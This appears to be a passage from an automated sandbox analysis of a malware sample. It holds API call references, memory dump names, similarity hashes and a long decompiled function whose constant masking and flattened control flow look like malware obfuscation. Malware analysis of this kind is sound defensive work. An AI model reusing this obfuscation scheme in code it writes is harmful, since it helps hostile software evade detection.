GetOpenClipboardWindow.USER32(?,-00000003,00000000,?,?,?,?,?,?,6F186935), ref: 6F186052
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F186081
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F186108
GetCurrentThread.KERNEL32 ref: 6F18612E

Part of subcall function 6F185D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F185E04
Part of subcall function 6F185D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F185E74
Part of subcall function 6F185D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6F185E93
Part of subcall function 6F185D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6F185EA4

Memory Dump Source

Source File: 00000001.00000002.463696634.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000001.00000002.463674012.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463993632.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.464071099.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardUnothrow_t@std@@@__ehfuncinfo$??2@$ThreadWindow$Open$CurrentDefaultErrorModeSystem$ApplicationAutomaticCheckCloseDimensionsForegroundLangLanguageMarkMenuPopupRestartResumeSwitchUnregisterUserViewer
String ID:
API String ID: 2542842856-0
Opcode ID: 6c04fe3a3db3fdd4091c89d6c2706453d5a53b6197bdbbeff7671fe5c135c1cb
Instruction ID: c41418a757e702dc60b091c61ec05903bc3894586131a5bf959630e53f884654
Opcode Fuzzy Hash: 6c04fe3a3db3fdd4091c89d6c2706453d5a53b6197bdbbeff7671fe5c135c1cb
Instruction Fuzzy Hash: 43E11B31D24F494BC203DE36845115BF7ABAFEB6E8F44871AF446B6192FB2478F29940

Uniqueness

Uniqueness Score: -1.00%

Function 00C9758F, Relevance: 19.5, Strings: 15, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00C9758F(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				void* _t861;
				void* _t862;
				void* _t869;
				void* _t872;
				void* _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t906;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				void* _t933;
				void* _t936;
				intOrPtr _t943;
				void* _t964;
				void* _t1012;
				void* _t1033;
				intOrPtr _t1035;
				void* _t1036;
				void* _t1041;
				signed int* _t1043;
				void* _t1047;

				_t1043 =  &_v420;
				_v256 = 0x4f9c4a;
				_v256 = _v256 * 0x68;
				_t1041 = 0;
				_t906 = 0xbe90c6a;
				_v72 = __ecx;
				_t912 = 0x7e;
				_v256 = _v256 / _t912;
				_v256 = _v256 ^ 0x4d03f198;
				_v364 = 0x177763;
				_v364 = _v364 + 0xffff64bb;
				_v364 = _v364 + 0xe006;
				_v364 = _v364 | 0x5810e9ef;
				_v364 = _v364 ^ 0x5817fdee;
				_v184 = 0xd17429;
				_v184 = _v184 >> 0xc;
				_v184 = _v184 ^ 0x00000d17;
				_v276 = 0x9cacd1;
				_v276 = _v276 | 0xea53a564;
				_t913 = 0x32;
				_v276 = _v276 * 0x12;
				_v276 = _v276 ^ 0x83ba3b3a;
				_v96 = 0xaecd02;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00005766;
				_v112 = 0x8c5899;
				_v112 = _v112 << 7;
				_v112 = _v112 ^ 0x462c4c80;
				_v292 = 0xa344d1;
				_v292 = _v292 ^ 0xc3a33b62;
				_v292 = _v292 >> 0xb;
				_v292 = _v292 ^ 0x0018600f;
				_v404 = 0x1a34bd;
				_v404 = _v404 / _t913;
				_t914 = 0x5c;
				_v404 = _v404 * 0x44;
				_v404 = _v404 ^ 0xb4a1f647;
				_v404 = _v404 ^ 0xb48255f7;
				_v156 = 0xeafd99;
				_v156 = _v156 ^ 0x78d68cc4;
				_v156 = _v156 ^ 0x783c715d;
				_v224 = 0x8d6eca;
				_v224 = _v224 + 0xffff086d;
				_v224 = _v224 << 9;
				_v224 = _v224 ^ 0x18ee6e00;
				_v332 = 0xc8bb61;
				_v332 = _v332 | 0x502870a4;
				_v332 = _v332 ^ 0xadb60793;
				_v332 = _v332 / _t914;
				_v332 = _v332 ^ 0x02c1084f;
				_v316 = 0xc820aa;
				_v316 = _v316 << 0xb;
				_v316 = _v316 + 0xb3c5;
				_v316 = _v316 << 0xf;
				_v316 = _v316 ^ 0x01e28000;
				_v356 = 0x969b2a;
				_v356 = _v356 >> 7;
				_v356 = _v356 >> 0xf;
				_t915 = 0x6b;
				_v356 = _v356 / _t915;
				_v356 = _v356 ^ 0x00000020;
				_v84 = 0xf2d01e;
				_v84 = _v84 ^ 0x2e4ac247;
				_v84 = _v84 ^ 0x2ebb6aea;
				_v144 = 0x74b502;
				_v144 = _v144 << 0xb;
				_v144 = _v144 ^ 0xa5a8359a;
				_v104 = 0x21a83d;
				_v104 = _v104 ^ 0x216ff468;
				_v104 = _v104 ^ 0x2146570e;
				_v220 = 0xb21177;
				_v220 = _v220 >> 2;
				_v220 = _v220 ^ 0x31fb2637;
				_v220 = _v220 ^ 0x31de94da;
				_v284 = 0x1ac8ae;
				_t916 = 0x2e;
				_v284 = _v284 * 0x56;
				_v284 = _v284 ^ 0x0f377588;
				_v284 = _v284 ^ 0x07c7370c;
				_v384 = 0x8eb0ef;
				_v384 = _v384 ^ 0x44be37ca;
				_v384 = _v384 << 7;
				_v384 = _v384 + 0xf6fc;
				_v384 = _v384 ^ 0x184fc2e2;
				_v376 = 0xa77a1b;
				_v376 = _v376 + 0x8c24;
				_v376 = _v376 | 0x82392e71;
				_v376 = _v376 << 6;
				_v376 = _v376 ^ 0xae40acf4;
				_v236 = 0xebcdd9;
				_v236 = _v236 + 0xffff32a9;
				_v236 = _v236 / _t916;
				_v236 = _v236 ^ 0x0004a748;
				_v136 = 0x23cd97;
				_t917 = 0x4c;
				_v136 = _v136 / _t917;
				_v136 = _v136 ^ 0x000f4235;
				_v320 = 0x4d819e;
				_v320 = _v320 + 0xffff59a4;
				_t918 = 0x45;
				_v320 = _v320 / _t918;
				_v320 = _v320 + 0xffff3895;
				_v320 = _v320 ^ 0x0001c602;
				_v344 = 0xb4c6e0;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 + 0x799f;
				_v344 = _v344 + 0xffffbc81;
				_v344 = _v344 ^ 0x0002d9ef;
				_v128 = 0x4f54de;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 ^ 0x00053c32;
				_v268 = 0x176356;
				_v268 = _v268 >> 3;
				_v268 = _v268 * 0x1d;
				_v268 = _v268 ^ 0x005f9f9a;
				_v260 = 0x1003dd;
				_v260 = _v260 >> 5;
				_v260 = _v260 >> 0xf;
				_v260 = _v260 ^ 0x0004fa47;
				_v192 = 0xf049bd;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x000ebb9c;
				_v204 = 0x77f092;
				_v204 = _v204 ^ 0x0888cc2a;
				_v204 = _v204 * 0xa;
				_v204 = _v204 ^ 0x59f833f3;
				_v120 = 0xc39394;
				_v120 = _v120 ^ 0xa5000bf8;
				_v120 = _v120 ^ 0xa5cbd510;
				_v280 = 0x16f38f;
				_v280 = _v280 ^ 0xb7b39911;
				_v280 = _v280 << 5;
				_v280 = _v280 ^ 0xf4ae8a62;
				_v416 = 0xc8df40;
				_v416 = _v416 + 0xffff9a73;
				_v416 = _v416 << 2;
				_v416 = _v416 + 0xde3e;
				_v416 = _v416 ^ 0x032ae0c4;
				_v408 = 0xb6b7dc;
				_v408 = _v408 | 0x1d048797;
				_v408 = _v408 ^ 0x94b64be8;
				_v408 = _v408 ^ 0x890ec1b7;
				_v88 = 0x71711;
				_v88 = _v88 << 0xb;
				_v88 = _v88 ^ 0x38b17380;
				_v328 = 0x6aef7d;
				_v328 = _v328 | 0x3603473e;
				_v328 = _v328 << 9;
				_v328 = _v328 >> 3;
				_v328 = _v328 ^ 0x1af8f484;
				_v176 = 0x792835;
				_v176 = _v176 >> 1;
				_v176 = _v176 ^ 0x0036a652;
				_v252 = 0x9468d7;
				_v252 = _v252 + 0x7830;
				_v252 = _v252 ^ 0xd0ee3c59;
				_v252 = _v252 ^ 0xd072a278;
				_v196 = 0xd921a2;
				_v196 = _v196 + 0xffff3880;
				_v196 = _v196 ^ 0x00d95c51;
				_v212 = 0x870085;
				_t919 = 0x69;
				_v212 = _v212 / _t919;
				_t920 = 0x78;
				_v212 = _v212 * 0x2e;
				_v212 = _v212 ^ 0x003b57a7;
				_v160 = 0x2d1808;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xa3079107;
				_v400 = 0xdd20ad;
				_v400 = _v400 << 1;
				_v400 = _v400 + 0xff0c;
				_v400 = _v400 / _t920;
				_v400 = _v400 ^ 0x0009d535;
				_v168 = 0xb5e108;
				_t921 = 0x28;
				_v168 = _v168 * 0x7e;
				_v168 = _v168 ^ 0x598f807d;
				_v100 = 0xcc7cfc;
				_v100 = _v100 << 1;
				_v100 = _v100 ^ 0x019cfda6;
				_v360 = 0x2020d1;
				_v360 = _v360 / _t921;
				_v360 = _v360 ^ 0xa4368d26;
				_v360 = _v360 + 0xffff6dea;
				_v360 = _v360 ^ 0xa439a72f;
				_v300 = 0x9a8970;
				_v300 = _v300 + 0x6ac3;
				_v300 = _v300 ^ 0xdf533136;
				_v300 = _v300 ^ 0xdfcc7ab7;
				_v336 = 0x4d2f66;
				_v336 = _v336 ^ 0xb8468911;
				_v336 = _v336 >> 9;
				_t922 = 0x2c;
				_v336 = _v336 / _t922;
				_v336 = _v336 ^ 0x0008a1e2;
				_v152 = 0x8d8bb4;
				_v152 = _v152 + 0xf34a;
				_v152 = _v152 ^ 0x0088ea9a;
				_v92 = 0xebdf2a;
				_v92 = _v92 + 0x1fc0;
				_v92 = _v92 ^ 0x00e0ef1e;
				_v244 = 0xde57cd;
				_t923 = 0x5e;
				_v244 = _v244 * 0x51;
				_v244 = _v244 << 1;
				_v244 = _v244 ^ 0x8cb9eb22;
				_v352 = 0x84200;
				_v352 = _v352 >> 7;
				_v352 = _v352 + 0x9bd1;
				_v352 = _v352 | 0xc56dbf5a;
				_v352 = _v352 ^ 0xc568fd6f;
				_v392 = 0x204a7e;
				_t391 =  &_v392; // 0x204a7e
				_v392 =  *_t391 * 0x7e;
				_v392 = _v392 + 0xdaeb;
				_v392 = _v392 | 0x2df721c0;
				_v392 = _v392 ^ 0x2ffae543;
				_v172 = 0x96349f;
				_v172 = _v172 + 0xffff1d8a;
				_v172 = _v172 ^ 0x0098dfc1;
				_v296 = 0x3cde35;
				_v296 = _v296 * 0x41;
				_v296 = _v296 + 0xffff7ce3;
				_v296 = _v296 ^ 0x0f755d51;
				_v180 = 0xa031bd;
				_v180 = _v180 + 0xa275;
				_v180 = _v180 ^ 0x00a7d974;
				_v272 = 0xb7c84a;
				_v272 = _v272 / _t923;
				_v272 = _v272 | 0xd44a22c1;
				_v272 = _v272 ^ 0xd440a7e0;
				_v312 = 0xb76f0b;
				_t924 = 0x54;
				_v312 = _v312 / _t924;
				_v312 = _v312 ^ 0x75c1d9a4;
				_v312 = _v312 ^ 0x75cdcef1;
				_v396 = 0x8eadc4;
				_v396 = _v396 | 0x5ef2844f;
				_t925 = 0x37;
				_v396 = _v396 * 0x70;
				_v396 = _v396 | 0xb52ece17;
				_v396 = _v396 ^ 0xbf68d27f;
				_v412 = 0xed4711;
				_v412 = _v412 / _t925;
				_t926 = 0x64;
				_v412 = _v412 / _t926;
				_v412 = _v412 << 6;
				_v412 = _v412 ^ 0x00074caa;
				_v164 = 0x9f0f24;
				_v164 = _v164 << 0x10;
				_v164 = _v164 ^ 0x0f2a873f;
				_v288 = 0x8fa230;
				_v288 = _v288 + 0xf8b3;
				_v288 = _v288 + 0xffff5eba;
				_v288 = _v288 ^ 0x0084fab5;
				_v264 = 0x25d466;
				_v264 = _v264 ^ 0xc8fa4bab;
				_v264 = _v264 << 0xd;
				_v264 = _v264 ^ 0xf3f19765;
				_v388 = 0xa70662;
				_v388 = _v388 ^ 0x76435d5f;
				_v388 = _v388 ^ 0xce62b89b;
				_t927 = 0xd;
				_v388 = _v388 / _t927;
				_v388 = _v388 ^ 0x0e3f124f;
				_v148 = 0x6ec34e;
				_t928 = 0x39;
				_v148 = _v148 * 0x4b;
				_v148 = _v148 ^ 0x207f0473;
				_v420 = 0x5b05ef;
				_v420 = _v420 * 0x25;
				_v420 = _v420 >> 6;
				_v420 = _v420 * 0x7c;
				_v420 = _v420 ^ 0x1974bb04;
				_v368 = 0x435f28;
				_v368 = _v368 + 0xffffc274;
				_v368 = _v368 * 0x6e;
				_v368 = _v368 | 0xd65eea1e;
				_v368 = _v368 ^ 0xded0429e;
				_v304 = 0x93c507;
				_v304 = _v304 << 7;
				_v304 = _v304 << 1;
				_v304 = _v304 ^ 0x93c7b412;
				_v372 = 0x3ab09e;
				_v372 = _v372 / _t928;
				_v372 = _v372 + 0x9840;
				_v372 = _v372 << 5;
				_v372 = _v372 ^ 0x003f3225;
				_v140 = 0xe0922e;
				_t929 = 0x35;
				_v140 = _v140 / _t929;
				_v140 = _v140 ^ 0x000de06a;
				_v380 = 0x9cee9c;
				_v380 = _v380 >> 7;
				_v380 = _v380 ^ 0x8b8b39e1;
				_v380 = _v380 | 0xd3725c45;
				_v380 = _v380 ^ 0xdbf3b506;
				_v124 = 0x14c858;
				_v124 = _v124 >> 5;
				_v124 = _v124 ^ 0x0005cb8b;
				_v340 = 0xcdac83;
				_v340 = _v340 << 0xc;
				_v340 = _v340 + 0xffff54ea;
				_v340 = _v340 * 0x4c;
				_v340 = _v340 ^ 0xf33e9117;
				_v232 = 0x8765f2;
				_v232 = _v232 + 0xffffd3a6;
				_v232 = _v232 ^ 0xbeaac7fe;
				_v232 = _v232 ^ 0xbe2d6bbf;
				_v240 = 0x74f089;
				_t1033 = 0x5cbacf6;
				_v240 = _v240 / _t929;
				_v240 = _v240 + 0xe71;
				_t1036 = 0xb521822;
				_v240 = _v240 ^ 0x0001dcb0;
				_v132 = 0x92ec18;
				_v132 = _v132 | 0xb5e13100;
				_v132 = _v132 ^ 0xb5fff93b;
				_v248 = 0x8e7a84;
				_t930 = 0x73;
				_v248 = _v248 / _t930;
				_v248 = _v248 >> 0xa;
				_v248 = _v248 ^ 0x0002468b;
				_v348 = 0x178165;
				_v348 = _v348 >> 0xa;
				_v348 = _v348 ^ 0xbf9cbca8;
				_v348 = _v348 ^ 0x63b24424;
				_v348 = _v348 ^ 0xdc254682;
				_v216 = 0xca158b;
				_t931 = 0x24;
				_v216 = _v216 * 0x6c;
				_v216 = _v216 + 0xffffa472;
				_v216 = _v216 ^ 0x5540f783;
				_v108 = 0x25d03d;
				_v108 = _v108 + 0x8456;
				_v108 = _v108 ^ 0x0026e62d;
				_v116 = 0x466460;
				_v116 = _v116 >> 0xc;
				_v116 = _v116 ^ 0x00061b51;
				_v188 = 0x2458d2;
				_v188 = _v188 + 0xbdd1;
				_v188 = _v188 ^ 0x002ec5b3;
				_v308 = 0x164457;
				_v308 = _v308 ^ 0x6f362586;
				_v308 = _v308 << 0xc;
				_v308 = _v308 ^ 0x061164e6;
				_v228 = 0xcf6c57;
				_v228 = _v228 | 0x3a05c2af;
				_v228 = _v228 << 5;
				_v228 = _v228 ^ 0x59fbbcc5;
				_v200 = 0xeb4a20;
				_t651 =  &_v200; // 0xeb4a20
				_v200 =  *_t651 / _t931;
				_v200 = _v200 >> 6;
				_v200 = _v200 ^ 0x000523f8;
				_v324 = 0xe1c19f;
				_v324 = _v324 ^ 0x6d349ec6;
				_v324 = _v324 + 0x697d;
				_v324 = _v324 ^ 0xf263d816;
				_v324 = _v324 ^ 0x9fb84d00;
				_v208 = 0x55635;
				_t932 = 0x1c;
				_v208 = _v208 / _t932;
				_v208 = _v208 * 0x2b;
				_v208 = _v208 ^ 0x000a980b;
				while(1) {
					L1:
					_t1012 = 0xd88e65a;
					_t933 = 0x5074933;
					_t861 = 0x8738794;
					do {
						while(1) {
							L2:
							_t1047 = _t906 - _t861;
							if(_t1047 <= 0) {
								break;
							}
							__eflags = _t906 - _t1036;
							if(__eflags == 0) {
								_push(_v380);
								_t862 = E00C93F5C(_v372, _v140, __eflags);
								_t936 = 0xc91180;
								_t1037 = _t862;
								_v44 = _v256;
								_v40 = _v364;
								_v36 = _v356;
								_t869 = E00CB0A43( *0xcb6048 + 0x20, _v124,  *((intOrPtr*)( *0xcb6048 + 0x68)), _t862, _v340, _v224, _v232, _t936,  &_v44, _t936, _v240, _v132, _v248, _v348,  *((intOrPtr*)( *0xcb6048 + 0x64)), _v80);
								_t1043 =  &(_t1043[0xe]);
								__eflags = _t869 - _v332;
								if(_t869 != _v332) {
									_t906 = 0x2b3d0f8;
								} else {
									_t906 = _t1033;
									_t1041 = 1;
								}
								E00CB0352(_v216, _v108, _t1037, _v116);
								L24:
								_t1012 = 0xd88e65a;
								_t933 = 0x5074933;
								_t1036 = 0xb521822;
								_t861 = 0x8738794;
								goto L25;
							}
							__eflags = _t906 - 0xbe90c6a;
							if(__eflags == 0) {
								_t906 = 0x3f3ad8a;
								continue;
							}
							__eflags = _t906 - _t1012;
							if(__eflags != 0) {
								goto L25;
							}
							_push(_v180);
							_t872 = E00C93F5C(_v172, _v296, __eflags);
							_t964 = 0xc910a0;
							__eflags = E00CA55BD( &_v76,  *0xcb6048 + 0x68, _t872, _v272, _t964, _v80, _v312, _v396, _v404, _v412, _v164, _v288) - _v156;
							_t906 =  ==  ? 0x8738794 : _t1033;
							E00CB0352(_v264, _v388, _t872, _v148);
							_t1043 =  &(_t1043[0xc]);
							goto L24;
						}
						if(_t1047 == 0) {
							_push(_t933);
							_t943 = E00C9F38A( *((intOrPtr*)( *0xcb6048 + 0x68)));
							__eflags = _t943;
							_t906 =  !=  ? _t1036 : _t1033;
							 *((intOrPtr*)( *0xcb6048 + 0x64)) = _t943;
							while(1) {
								L1:
								_t1012 = 0xd88e65a;
								_t933 = 0x5074933;
								_t861 = 0x8738794;
								goto L2;
							}
						}
						if(_t906 == 0x2b3d0f8) {
							E00C92043( *((intOrPtr*)( *0xcb6048 + 0x64)), _v188, _v308, _v228);
							_t906 = _t1033;
							goto L1;
						}
						if(_t906 == 0x3f3ad8a) {
							_push(_v104);
							_push(0xc91120);
							_t884 = E00C93F5C(_v84, _v144, __eflags);
							_push(_v384);
							_push(0xc91030);
							__eflags = E00CA54FD(_v376,  &_v80, _t884, _v236, _v136, _v276, _v320, E00C93F5C(_v220, _v284, __eflags)) - _v96;
							_t906 =  ==  ? 0x5074933 : 0x6145fc;
							E00CB0352(_v344, _v128, _t884, _v268);
							E00CB0352(_v260, _v192, _t885, _v204);
							_t1043 =  &(_t1043[0xe]);
							L11:
							_t1033 = 0x5cbacf6;
							goto L24;
						}
						if(_t906 == _t933) {
							_push(_v416);
							_push(0xc91070);
							_t891 = E00C93F5C(_v120, _v280, __eflags);
							_push(_v328);
							_t1035 = _t891;
							_push(0xc91100);
							_t892 = E00C93F5C(_v408, _v88, __eflags);
							_v64 = _v184;
							_t894 = E00CAF6D3(_v176, _v252, _v196, _t1035);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1035;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							_v52 = 1;
							__eflags = E00C9D9C6(_v72,  &_v32, _v212, _v160, _v112, _t892, _v400,  &_v76, _v168, _v100,  &_v56, _t897, _v360, _v300) - _v292;
							_t906 =  ==  ? 0xd88e65a : 0x5cbacf6;
							E00CB0352(_v336, _v152, _t1035, _v92);
							E00CB0352(_v244, _v352, _t892, _v392);
							_t1043 =  &(_t1043[0x16]);
							goto L11;
						}
						if(_t906 != _t1033) {
							goto L25;
						}
						E00C92153(_v316, _v200, _v324, _v80, _v208);
						L9:
						return _t1041;
						L25:
						__eflags = _t906 - 0x6145fc;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x00c9758f
0x00c97595
0x00c975ae
0x00c975b5
0x00c975be
0x00c975c5
0x00c975cc
0x00c975d1
0x00c975da
0x00c975e5
0x00c975ed
0x00c975f5
0x00c975fd
0x00c97605
0x00c9760d
0x00c97618
0x00c97620
0x00c9762b
0x00c97636
0x00c97649
0x00c9764c
0x00c97653
0x00c9765e
0x00c97669
0x00c97671
0x00c9767c
0x00c97687
0x00c9768f
0x00c9769a
0x00c976a5
0x00c976b0
0x00c976b8
0x00c976c3
0x00c976d3
0x00c976dc
0x00c976df
0x00c976e3
0x00c976eb
0x00c976f3
0x00c976fe
0x00c97709
0x00c97714
0x00c9771f
0x00c9772a
0x00c97732
0x00c9773d
0x00c97745
0x00c9774d
0x00c9775d
0x00c97761
0x00c97769
0x00c97771
0x00c97776
0x00c9777e
0x00c97783
0x00c9778b
0x00c97793
0x00c97798
0x00c977a1
0x00c977a4
0x00c977aa
0x00c977af
0x00c977ba
0x00c977c5
0x00c977d0
0x00c977db
0x00c977e3
0x00c977ee
0x00c977f9
0x00c97804
0x00c9780f
0x00c9781a
0x00c97822
0x00c9782d
0x00c97838
0x00c9784d
0x00c97850
0x00c97857
0x00c97862
0x00c9786d
0x00c97875
0x00c9787d
0x00c97882
0x00c9788a
0x00c97892
0x00c9789a
0x00c978a2
0x00c978aa
0x00c978af
0x00c978b7
0x00c978c2
0x00c978d8
0x00c978df
0x00c978ea
0x00c978fc
0x00c97901
0x00c9790a
0x00c97915
0x00c9791d
0x00c97929
0x00c9792c
0x00c97930
0x00c97938
0x00c97940
0x00c97948
0x00c9794d
0x00c97955
0x00c9795d
0x00c97965
0x00c97970
0x00c97978
0x00c97983
0x00c9798e
0x00c9799e
0x00c979a5
0x00c979b0
0x00c979bb
0x00c979c3
0x00c979cb
0x00c979d6
0x00c979e1
0x00c979e9
0x00c979f4
0x00c979ff
0x00c97a12
0x00c97a19
0x00c97a26
0x00c97a31
0x00c97a3c
0x00c97a47
0x00c97a52
0x00c97a5d
0x00c97a65
0x00c97a70
0x00c97a78
0x00c97a80
0x00c97a85
0x00c97a8d
0x00c97a95
0x00c97a9d
0x00c97aad
0x00c97ab5
0x00c97abd
0x00c97ac8
0x00c97ad0
0x00c97adb
0x00c97ae3
0x00c97aeb
0x00c97af0
0x00c97af5
0x00c97afd
0x00c97b08
0x00c97b0f
0x00c97b1a
0x00c97b25
0x00c97b30
0x00c97b3b
0x00c97b46
0x00c97b51
0x00c97b5c
0x00c97b67
0x00c97b7b
0x00c97b80
0x00c97b91
0x00c97b94
0x00c97b9b
0x00c97ba6
0x00c97bb1
0x00c97bb9
0x00c97bc4
0x00c97bcc
0x00c97bd0
0x00c97be0
0x00c97be4
0x00c97bec
0x00c97bff
0x00c97c00
0x00c97c07
0x00c97c12
0x00c97c1d
0x00c97c24
0x00c97c2f
0x00c97c3d
0x00c97c41
0x00c97c49
0x00c97c51
0x00c97c59
0x00c97c64
0x00c97c6f
0x00c97c7a
0x00c97c85
0x00c97c8f
0x00c97c97
0x00c97ca2
0x00c97ca7
0x00c97cad
0x00c97cb5
0x00c97cc0
0x00c97ccb
0x00c97cd6
0x00c97ce1
0x00c97cec
0x00c97cf7
0x00c97d0a
0x00c97d0d
0x00c97d14
0x00c97d1b
0x00c97d26
0x00c97d2e
0x00c97d33
0x00c97d3b
0x00c97d43
0x00c97d4b
0x00c97d53
0x00c97d58
0x00c97d5c
0x00c97d64
0x00c97d6c
0x00c97d74
0x00c97d7f
0x00c97d8a
0x00c97d95
0x00c97da8
0x00c97daf
0x00c97dba
0x00c97dc5
0x00c97dd0
0x00c97ddb
0x00c97de6
0x00c97dfc
0x00c97e03
0x00c97e0e
0x00c97e19
0x00c97e2b
0x00c97e30
0x00c97e39
0x00c97e44
0x00c97e4f
0x00c97e57
0x00c97e64
0x00c97e67
0x00c97e6b
0x00c97e73
0x00c97e7b
0x00c97e8b
0x00c97e93
0x00c97e96
0x00c97e9a
0x00c97e9f
0x00c97ea9
0x00c97eb4
0x00c97ebc
0x00c97ec7
0x00c97ed2
0x00c97edd
0x00c97ee8
0x00c97ef3
0x00c97efe
0x00c97f09
0x00c97f11
0x00c97f1c
0x00c97f24
0x00c97f2c
0x00c97f3a
0x00c97f3f
0x00c97f45
0x00c97f4d
0x00c97f60
0x00c97f63
0x00c97f6a
0x00c97f75
0x00c97f82
0x00c97f86
0x00c97f90
0x00c97f94
0x00c97f9c
0x00c97fa4
0x00c97fb1
0x00c97fb5
0x00c97fbd
0x00c97fc5
0x00c97fd0
0x00c97fd8
0x00c97fdf
0x00c97fea
0x00c97ffa
0x00c97ffe
0x00c98006
0x00c9800b
0x00c98013
0x00c98025
0x00c98028
0x00c9802f
0x00c9803a
0x00c98042
0x00c98047
0x00c9804f
0x00c98057
0x00c9805f
0x00c9806a
0x00c98072
0x00c9807d
0x00c98085
0x00c9808a
0x00c98097
0x00c9809b
0x00c980a3
0x00c980ae
0x00c980b9
0x00c980c4
0x00c980cf
0x00c980e3
0x00c980ec
0x00c980f5
0x00c98100
0x00c98105
0x00c98110
0x00c9811b
0x00c98126
0x00c98131
0x00c98143
0x00c98148
0x00c98151
0x00c98159
0x00c98164
0x00c9816c
0x00c98171
0x00c98179
0x00c98181
0x00c98189
0x00c9819c
0x00c9819f
0x00c981a6
0x00c981b1
0x00c981bc
0x00c981c7
0x00c981d2
0x00c981dd
0x00c981e8
0x00c981f0
0x00c981fb
0x00c98206
0x00c98211
0x00c9821c
0x00c98227
0x00c98232
0x00c9823a
0x00c98245
0x00c98250
0x00c9825b
0x00c98263
0x00c9826e
0x00c98279
0x00c98284
0x00c9828b
0x00c98293
0x00c9829e
0x00c982a6
0x00c982ae
0x00c982b6
0x00c982be
0x00c982c6
0x00c982d8
0x00c982db
0x00c982ea
0x00c982f1
0x00c982fc
0x00c982fc
0x00c982fc
0x00c98301
0x00c98306
0x00c9830b
0x00c9830b
0x00c9830b
0x00c9830b
0x00c9830d
0x00000000
0x00000000
0x00c985e4
0x00c985e6
0x00c986a8
0x00c986bc
0x00c986c2
0x00c986c3
0x00c986cc
0x00c986d7
0x00c986e9
0x00c98743
0x00c98748
0x00c9874b
0x00c9874f
0x00c98758
0x00c98751
0x00c98753
0x00c98755
0x00c98755
0x00c98773
0x00c9877a
0x00c9877a
0x00c9877f
0x00c98784
0x00c98789
0x00000000
0x00c98789
0x00c985ec
0x00c985f2
0x00c9869e
0x00000000
0x00c9869e
0x00c985f8
0x00c985fa
0x00000000
0x00000000
0x00c98600
0x00c9861a
0x00c98620
0x00c98674
0x00c9868d
0x00c98691
0x00c98696
0x00000000
0x00c98696
0x00c98313
0x00c985c3
0x00c985ce
0x00c985d7
0x00c985d9
0x00c985dc
0x00c982fc
0x00c982fc
0x00c982fc
0x00c98301
0x00c98306
0x00000000
0x00c98306
0x00c982fc
0x00c9831f
0x00c985a1
0x00c985a8
0x00000000
0x00c985a8
0x00c9832b
0x00c984c0
0x00c984d5
0x00c984da
0x00c984df
0x00c984f3
0x00c9853b
0x00c98557
0x00c9855b
0x00c98576
0x00c9857b
0x00c984b6
0x00c984b6
0x00000000
0x00c984b6
0x00c98333
0x00c98372
0x00c98384
0x00c98389
0x00c9838e
0x00c98399
0x00c9839f
0x00c983a4
0x00c983c8
0x00c983cf
0x00c983e4
0x00c983f3
0x00c983fa
0x00c98408
0x00c9840f
0x00c98417
0x00c98422
0x00c9847c
0x00c98491
0x00c98499
0x00c984ae
0x00c984b3
0x00000000
0x00c984b3
0x00c98337
0x00000000
0x00000000
0x00c9835d
